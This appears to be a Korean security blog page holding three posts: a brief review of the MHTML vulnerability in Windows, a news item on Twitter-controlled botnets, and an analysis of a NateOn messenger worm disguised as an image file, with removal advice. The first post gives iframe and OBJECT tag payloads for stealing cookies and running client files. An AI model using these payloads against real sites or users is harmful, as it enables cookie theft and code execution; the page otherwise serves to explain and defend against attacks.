기사를 통해서 MHTML 취약점에 대해서 접한 후, 리뷰를 급하게 작성합니다.

1. 취약 대상
  Windows 사용자

2. 핵심 기법
  주소에 MHTML: 첨부할 경우 여러 필터링 통과 가능

3. 응용
  <iframe src="MHTML:http://target/file/any.html!cookie"></iframe>

 <iframe src="mhtml:http://target/file/any.html?a=header with content-type"></iframe> 
 or content-type의 대한 보안이 있는 경우 따로 파일에 저장 후 html에 인젝션 해서 불러온다.

 <OBJECT CLASSID=CLSID:1111111-1111-1111-1111-111111111111 CODEBASE=file_path></OBJECT> 
 클라이언트의 파일을 실행할 수 있다.

4. 참고 자료
  http://www.boannews.com/media/view.asp?page=1&idx=24698&search=&find=&kind=1
  http://www.exploit-db.com/exploits/16071/
  http://kjcc2.tistory.com/898

'보안 기술 자료 (D:\) > D:\> WEB' 카테고리의 다른 글

Encoding Web Shells in PNG IDAT chunks  (0) 2015.06.16
중국발 해킹의 발전과 대응  (0) 2010.12.25
디렉토리 리스팅 취약점을 이용한 게임db서버 해킹사례  (0) 2010.11.13
취약한 웹서버를 이용한 해킹 및 악성코드 삽입 사례  (0) 2010.10.13
OWASP 웹해킹 TOP 10  (0) 2010.08.21

정말 오래전 IRCBOT 이라는 바이러스를 혹시나 기억하시나요? 트로이목마 입니다만, 어떠한 명령을 IRC 채팅방을 통해서 명령을 내리기 때문에 IRCBOT 이라고 불렀습니다.

감염이 되면 특정 IRC 채널에 접속하여 명령을 기다리고 있다가 크래커가 설정한 명령어를 내리면 그대로 봇이 행하는 형식이였습니다. 즉, 해당 채팅방 서버에 접속해보면 얼마나 감염이 됬는지 대충 예상할 수 있었죠.

요즘에는 호스팅을 받거나, 서버를 크래킹하여서 좀비PC의 명령지로 악용을 하는 수법을 사용하고 있는데, 기어코 더욱 진화된 방법이 나오고 말았습니다.

요즘 많이 사용하시는 SNS 트위터를 이용하여 명령을 내리는 방식이 출현한 것입니다. 이것이 다른 수법과 다른점이 뭐냐면 트위터에 경우에는 추적이 굉장히 어렵습니다.

트위터 계정을 생성했을 당시에 아이피, 트위터를 접속했을 때의 아이피, 글을 올릴때의 아이피를 이용해서 추적을 수행해야 하는데, 이 부분이 굉장히 어려운 부분이기 때문에, 검거가 상당히 어렵습니다. 트위터에 경우에는 수만이 이용하고 있기 때문에 모니터링이 힘들다는 단점이 있기 때문이죠.

이것을 이용한 좀비PC 툴이라... 더욱 무서워지고 있는 툴에 놀랄수 밖에 없네요

http://mcaf.ee/42597

'Security News (A:\) > A:\> Korean News' 카테고리의 다른 글

컴퓨터 사용자 39%가 자신의 컴퓨터에 한 일은?  (0) 2011.02.09
구글 "크롬 해킹하면 2만달러 주겠다"  (0) 2011.02.04
개인정보 유출 피해는 모르쇠...“유출만 계속 막아!”  (0) 2011.01.25
IE9 RC에 ‘액티브X 필터’ 추가된다  (0) 2011.01.21
IPv6 전환 가속화... 보안은 이를 따라가지 못해  (0) 2011.01.18


1. 증상

감염자 컴퓨터를 통해 로그인 한 네이트온 사용자 계정의 친구들에게 감염파일을 받을 수 있는 URL이 담긴 쪽지를 전송함으로써 자신을 재배포 한다.

정상적인 네이트온 실행 방해, 정상적인 인터넷 서핑 방해

2. 분석


파일 확장자는 exe 이나, 그림파일 아이콘을 가짐으로써 자신을 정상 그림파일인 것으로 가장한다.
파일을 마치 TN프록시 모듈 (중국어 버전) 인 것처럼 서명해놓았다.

실행시 자동으로 네이트온 사용자에게 "고급 술집의 고급서비스 카드 프로모션 www.yabsxxx.com" 등과 같은 바이러스 유포지 주소를 포함한 쪽지를 살포하게 된다.

기존과 다르게 "데이터 폭탄" 기능을 추가로 넣어 Avast의 감시를 피하였다.
이외에는 네이트온 바이러스 변종들과 별다른 차이가 없다.

http://www.virustotal.com/file-scan/report.html?id=ebba6bb18985bd57508ec468d16d3a36fb57869d6036aa10266a32600d2bea8d-1295968622


3. 치료법

현재 해당 바이러스는 Microsoft Essential(http://www.microsoft.com/security_essentials/) , Antivir (http://www.avira.com/) 에서 치료 및 삭제가 가능하다.

'잡다한 자료 (C:\) > C:\> 바이러스 분석' 카테고리의 다른 글

신종 MBR 파괴 악성코드 분석  (2) 2012.01.21
inde.jpg.exe NateOn 바이러스 증상 및 치료법  (0) 2011.02.12
picte.jpg.exe NateOn 바이러스 증상 및 치료법  (0) 2011.01.16
bsoxg.jpg.exe NateOn 바이러스 증상 및 치료법  (0) 2011.01.09
noek.jpg.exe NateOn 바이러스 증상 및 치료법  (0) 2011.01.02

+ Recent posts

티스토리툴바